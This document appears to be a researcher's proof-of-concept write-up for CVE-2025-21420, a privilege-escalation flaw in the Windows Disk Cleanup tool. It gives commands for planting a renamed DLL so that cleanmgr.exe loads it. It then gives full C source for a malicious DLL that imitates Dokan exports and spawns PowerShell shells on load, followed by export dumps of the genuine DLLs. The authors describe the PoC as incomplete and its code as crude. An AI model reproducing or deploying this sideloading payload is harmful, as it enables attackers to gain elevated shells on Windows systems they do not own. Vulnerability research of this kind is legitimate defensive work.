CVE-2025-21420 PoC

(Windows Disk Cleanup Tool Elevation of Privilege Vulnerability)

AFAIK, albeit incomplete, this is the first PoC to this CVE. ATM there's no info available about the CVE, so we don't know if we discovered something new or part of the exploit.

• https://nvd.nist.gov/vuln/detail/CVE-2025-21420
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21420

We found a way to DLL sideload with cleanmgr.exe

$ cp .\dokan1.dll C:\Users\<username>\System32\System32\System32\dokannp1.dll
$ cleanmgr /sageset:2

Just use regular DLL Sideloading and it will rain shellz. We have not yet tested, if it's sufficient to have the second dll name only, or if the first, slightly different one, is also used (may have mistaken the names at first look in ProcMon due to small font size).

Currently still working on the PrivEsc part, but it's very likely just scheduling cleanmgr.exe for NT-Authority\System or waiting till it's triggered by the system, e.g. by Filling a Disk or creating too many temp files.

Warning: The following is still Research Level (meaning, total crap code), it will pop hundreds of Message Boxes and shells. The same can be done with much less code.

#include <stdio.h>
#include "pch.h"
#include <stdlib.h>
#include <windows.h>


__declspec(dllexport) void DokanDebugMode();
__declspec(dllexport) void DokanDriverVersion();
__declspec(dllexport) void DokanGetMountPointList();
__declspec(dllexport) void DokanIsNameInExpression();
__declspec(dllexport) void DokanMain();
__declspec(dllexport) void DokanMapKernelToUserCreateFileFlags();
__declspec(dllexport) void DokanNetworkProviderInstall();
__declspec(dllexport) void DokanNetworkProviderUninstall();
__declspec(dllexport) void DokanNotifyCreate();
__declspec(dllexport) void DokanNotifyDelete();
__declspec(dllexport) void DokanNotifyRename();
__declspec(dllexport) void DokanNotifyUpdate();
__declspec(dllexport) void DokanNotifyXAttrUpdate();
__declspec(dllexport) void DokanNtStatusFromWin32();
__declspec(dllexport) void DokanOpenRequestorToken();
__declspec(dllexport) void DokanReleaseMountPointList();
__declspec(dllexport) void DokanRemoveMountPoint();
__declspec(dllexport) void DokanResetTimeout();
__declspec(dllexport) void DokanServiceDelete();
__declspec(dllexport) void DokanServiceInstall();
__declspec(dllexport) void DokanSetDebugMode();
__declspec(dllexport) void DokanUnmount();
__declspec(dllexport) void DokanUseStdErr();
__declspec(dllexport) void DokanVersion();

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved)
{
    
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    default:
        DokanMain();
        break;
    }
    return TRUE;
}

void DokanMain() {
    MessageBoxW(NULL, L"Hello World2", L"DLL Message", MB_OK);
    system("powershell.exe");
    HANDLE hThread = NULL;

    wchar_t cmdLine[] = L"powershell.exe"; 
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };

    si.cb = sizeof(si);

    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)DokanDebugMode, NULL, 0, NULL);
    return;
}

void DokanDebugMode() {  DokanMain(); return;};
void DokanDriverVersion() {  DokanMain(); return;};
void DokanGetMountPointList() {  DokanMain(); return;};
void DokanIsNameInExpression() {  DokanMain(); return;};
void DokanMapKernelToUserCreateFileFlags() {  DokanMain(); return;};
void DokanNetworkProviderInstall() {  DokanMain(); return;};
void DokanNetworkProviderUninstall() {  DokanMain(); return;};
void DokanNotifyCreate() {  DokanMain(); return;};
void DokanNotifyDelete() {  DokanMain(); return;};
void DokanNotifyRename() {  DokanMain(); return;};
void DokanNotifyUpdate() {  DokanMain(); return;};
void DokanNotifyXAttrUpdate() {  DokanMain(); return;};
void DokanNtStatusFromWin32() {  DokanMain(); return;};
void DokanOpenRequestorToken() {  DokanMain(); return;};
void DokanReleaseMountPointList() {  DokanMain(); return;};
void DokanRemoveMountPoint() {  DokanMain(); return;};
void DokanResetTimeout() {  DokanMain(); return;};
void DokanServiceDelete() {  DokanMain(); return;};
void DokanServiceInstall() {  DokanMain(); return;};
void DokanSetDebugMode() {  DokanMain(); return;};
void DokanUnmount() {  DokanMain(); return;};
void DokanUseStdErr() {  DokanMain(); return;};
void DokanVersion() {  DokanMain(); return;};

Some Background

$ dumpbin /exports C:\Windows\System32\dokan1.dll
Microsoft (R) COFF/PE Dumper Version 14.34.31937.0
Copyright (C) Microsoft Corporation.  All rights reserved.


Dump of file C:\Windows\System32\dokan1.dll

File Type: DLL


    ordinal hint RVA      name

          1    0 00004E40 DokanDebugMode
          2    1 0000F760 DokanDriverVersion
          3    2 00006F00 DokanGetMountPointList
          4    3 000045F0 DokanIsNameInExpression
          5    4 000052E0 DokanMain
          6    5 00007230 DokanMapKernelToUserCreateFileFlags
          7    6 000098F0 DokanNetworkProviderInstall
          8    7 00009B70 DokanNetworkProviderUninstall
          9    8 00007530 DokanNotifyCreate
         10    9 00007550 DokanNotifyDelete
         11    A 00007590 DokanNotifyRename
         12    B 00007570 DokanNotifyUpdate
         13    C 00007580 DokanNotifyXAttrUpdate
         14    D 0000AB80 DokanNtStatusFromWin32
         15    E 00001340 DokanOpenRequestorToken
         16    F 00007160 DokanReleaseMountPointList
         17   10 0000A9F0 DokanRemoveMountPoint
         18   11 0000F430 DokanResetTimeout
         19   12 00009790 DokanServiceDelete
         20   13 00009650 DokanServiceInstall
         21   14 00006BE0 DokanSetDebugMode
         22   15 00009870 DokanUnmount
         23   16 00004E30 DokanUseStdErr
         24   17 0000F750 DokanVersion

  Summary
        6000 .pdata
       15000 .rdata
        1000 .reloc
        1000 .rsrc
       60000 .text
        1000 _RDATA

Comparing both exports it's clear that we don't need all the function names.

$ dumpbin /exports C:\Windows\System32\dokannp1.dll
Microsoft (R) COFF/PE Dumper Version 14.34.31937.0
Copyright (C) Microsoft Corporation.  All rights reserved.



Dump of file C:\Windows\System32\dokannp1.dll

File Type: DLL

  Section contains the following exports for dokannp1.dll

    00000000 characteristics
    FFFFFFFF time date stamp
        0.00 version
          12 ordinal base
         490 number of functions
          13 number of names

    ordinal hint RVA      name

         17    0 00001720 NPAddConnection
         38    1 00001810 NPAddConnection3
         18    2 000018F0 NPCancelConnection
         35    3 00001E80 NPCloseEnum
         34    4 00002140 NPEnumResource
         13    5 000014B0 NPGetCaps
         12    6 00001A50 NPGetConnection
         52    7 00002780 NPGetResourceInformation
         41    8 00001ED0 NPGetResourceParent
         40    9 00002C70 NPGetUniversalName
        500    A 000016C0 NPLogonNotify
         33    B 00001BF0 NPOpenEnum
        501    C 000016F0 NPPasswordChangeNotify

  Summary

        3000 .data
        5000 .pdata
       14000 .rdata
        1000 .reloc
        1000 .rsrc
       50000 .text
        1000 _RDATA